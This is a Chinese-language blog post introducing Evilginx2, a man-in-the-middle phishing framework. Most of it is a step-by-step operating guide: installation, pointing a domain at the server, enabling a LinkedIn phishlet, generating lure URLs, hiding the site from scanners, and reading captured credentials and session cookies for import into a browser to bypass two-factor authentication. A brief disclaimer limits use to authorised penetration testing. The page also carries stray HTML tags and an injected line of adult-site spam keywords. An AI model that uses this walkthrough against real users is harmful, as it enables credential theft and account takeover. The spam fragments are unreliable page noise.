<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一款高級網絡釣魚攻擊框架

    VSole2023-07-19 10:16:53

    Evilginx2介紹

    evilginx2是一個中間人攻擊框架,用于網絡釣魚登錄憑據以及會話cookie,從而允許繞過雙因素身份驗證保護。

    該工具是2017年發布的Evilginx的升級產品,它使用自定義版本的nginx HTTP服務器提供中間人功能,作為瀏覽器和網絡釣魚網站之間的代理。當前版本完全用GO作為獨立應用程序編寫,它實現了自己的HTTP和DNS服務器,使其易于設置和使用。

    Evilginx2用途聲明

    我非常清楚Evilginx2可以用于惡意目的。這項工作僅僅證明了攻擊者可以做些什么。防御者有責任考慮此類攻擊并找到保護其用戶免受此類網絡釣魚攻擊的方法。Evilginx只能在合法滲透測試任務中使用,并且必須得到被破壞方的書面許可。

    Evilginx2安裝與使用

    可以使用預編譯的二進制包,也可以從源代碼編譯evilginx2。需要一個外部服務器,在其中托管evilginx2安裝。

    從源代碼安裝

    要從源代碼編譯,請確保已安裝版本至少為1.10.0的GO(從此處獲取)并且正確設置環境變量 $GOPATH (def. $HOME/go)

    安裝完畢后,將它添加到你的~/.profile,假設你安裝GO在/usr/local/go:

    export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
    

    然后加載它source ~/.profiles。

    現在你應該準備安裝evilginx2了:

    sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2make
    

    您現在可以從本地目錄運行evilginx2,如:

    sudo ./bin/evilginx -p ./phishlets/
    

    或全局安裝:

    sudo make installsudo evilginx
    

    上面的說明也可用于將evilginx2更新到最新版本。

    使用Docker安裝

    您可以從Docker中啟動evilginx2。首先構建容器:

    docker build . -t evilginx2
    

    然后你可以運行容器:

    docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
    

    Phishlets裝在容器內/app/phishlets,可以作為配置安裝。

    從預編譯的二進制包安裝

    從這里抓住你想要的包

    如果要進行系統范圍的安裝,請使用具有root權限的安裝腳本:

    chmod 700 ./install.shsudo ./install.shsudo evilginx
    

    或者只是從當前目錄啟動evilginx2(您還需要root權限):

    chmod 700 ./evilginxsudo ./evilginx
    

    用法

    重要!確保端口上沒有服務偵聽TCP 443,TCP 80并且UDP 53。您可能需要關閉apache或nginx以及用于解析可能正在運行的DNS的任何服務。如果無法在任何這些端口上打開偵聽,evilginx2將在啟動時告訴您。

    默認情況下,evilginx2將在./phishlets/目錄中以及稍后的目錄中查找網絡釣魚/usr/share/evilginx/phishlets/。如果要指定從中加載網絡釣魚的自定義路徑,請-p 在啟動工具時使用該參數。

    Usage of ./evilginx:  -debug        Enable debug output  -developer        Enable developer mode (generates self-signed certificates for all hostnames)  -p string        Phishlets directory path
    

    您應該看到evilginx2徽標,并提示輸入命令。鍵入help或help 是否要查看可用命令或有關它們的更多詳細信息。

    入門

    要啟動并運行,您需要先進行一些設置。

    此時我假設您已經注冊了一個域名(讓我們稱之為yourdomain.com),您在域名提供商的管理面板中設置名稱服務器(兩者ns1和ns2)以指向服務器的IP(例如10.0.0.1):

    ns1.yourdomain.com = 10.0.0.1ns2.yourdomain.com = 10.0.0.1
    

    使用以下命令設置服務器的域和IP:

    config domain yourdomain.comconfig ip 10.0.0.1
    

    現在您可以設置要使用的網絡釣魚。為了這個簡短的指南,我們將使用LinkedIn網絡釣魚。設置網絡釣魚的主機名(顯然必須包含您的域名):

    phishlets hostname linkedin my.phishing.hostname.yourdomain.com
    

    現在你可以enable使用phishlet,它會啟動LetsEncrypt SSL / TLS證書的自動檢索,如果你在本地找不到你選擇的主機名:

    phishlets enable linkedin
    

    您的網上誘騙網站現已上線。想想URL,您希望受害者在成功登錄時被重定向到并獲得這樣的網絡釣魚URL(受害者將被重定向到https://www.google.com):

    phishlets get-url linkedin https://www.google.com
    

    運行phishlets只響應標記化鏈接,所以誰掃描您的主域的任何掃描儀將被重定向到URL指定為redirect_url下config。如果要隱藏您的網絡釣魚并使其甚至不響應有效的標記化網絡釣魚URL,請使用phishlet hide/unhide 命令。

    您可以使用以下方式監控捕獲的憑據和會話cookie

    sessions
    

    要獲取有關捕獲的會話的詳細信息,請使用會話cookie本身(將在底部以JSON格式打印),選擇其會話ID:

    sessions <id>
    

    可以使用EditThisCookie擴展將已捕獲的會話Cookie復制并導入Chrome瀏覽器。

    重要!如果您希望evilginx2在從服務器注銷后繼續運行,則應在screen會話中運行它。

    網絡釣魚
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Microsoft警告說,中間對手(AiTM)網絡釣魚技術正在增加,這些技術正在作為網絡釣魚即服務(PhaaS)網絡犯罪模型的一部分進行傳播。
    網絡釣魚網絡攻擊者們經常采用的一種社會工程學攻擊手段,通過采用欺詐性操縱的策略,誘騙企業員工點擊可疑鏈接、打開被感染的電子郵件,或暴露他們的賬戶信息。據思科公司研究報告顯示,86%的企業都遇到過網絡釣魚攻擊,而只要有一名內部員工淪為網絡釣魚攻擊的受害者,就可能會危及整個組織網絡系統的安全性。
    IDSA報告揭秘2022年最可怕的攻擊方式!
    網絡釣魚攻擊變得越來越普遍,而且只會變得越來越詭計多端。雖然有眾多方法可以保護自己免受網絡釣魚攻擊,但最有效的方法之一是能夠識破它們。有鑒于此,本文在下面列出了表明電子郵件或其他通信內容可能是網絡釣魚企圖的10個常見跡象。
    摩爾多瓦的政府機構受到一波網絡釣魚攻擊的襲擊,威脅行為者向屬于該國國家服務的賬戶發送了 1,330 多封電子郵件。
    網絡釣魚19式
    2022-11-27 07:33:13
    隨著技術的進步,黑客和網絡犯罪分子將不斷開發新的網絡釣魚技術來竊取敏感數據。更專業的攻擊者甚至會從合法公司復制完全相同的電子郵件格式,并包含惡意鏈接、文檔或圖像文件,以欺騙用戶“確認”其個人信息或自動下載惡意代碼。建議通過適當的渠道與該帳戶的個人核實溝通。在過去,瀏覽器可以檢測到沒有啟用HTTPS的網站,這是防止網絡犯罪的第一道防線。
    攻擊者正在欺騙廣泛使用的加密貨幣交易所來欺騙用戶登錄,以便他們可以竊取他們的憑據并最終竊取他們的資金。
    網絡釣魚是大家所熟悉的一種網絡攻擊,這種攻擊也被認為是一種社會工程攻擊,主要是黑客通過將自己偽裝起來,進行欺騙和收集受害者的個人敏感信息。這種類型的攻擊一般而言,是通過短信或者是電子郵件進行網絡釣魚,電子郵件釣魚攻擊,是比較有效的網絡之一,很多的網絡攻擊都是源自于電子郵件的釣魚攻擊。
    網絡釣魚依然是當今企業面臨的頭號網絡安全威脅,從憑證泄露到惡意軟件投放,超過八成的網絡攻擊都將網絡釣魚作為初始攻擊媒介。根據APWG最新發布的網絡釣魚活動趨勢報告,2022年第一季度共檢測到1,025,968次網絡釣魚攻擊,創下季度歷史新高。2022年3月發生了384,291次攻擊,創下月度攻擊次數的紀錄。
    與去年同期相比,第一季度利用 Microsoft 品牌進行的網絡釣魚攻擊實例增加了 266%。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类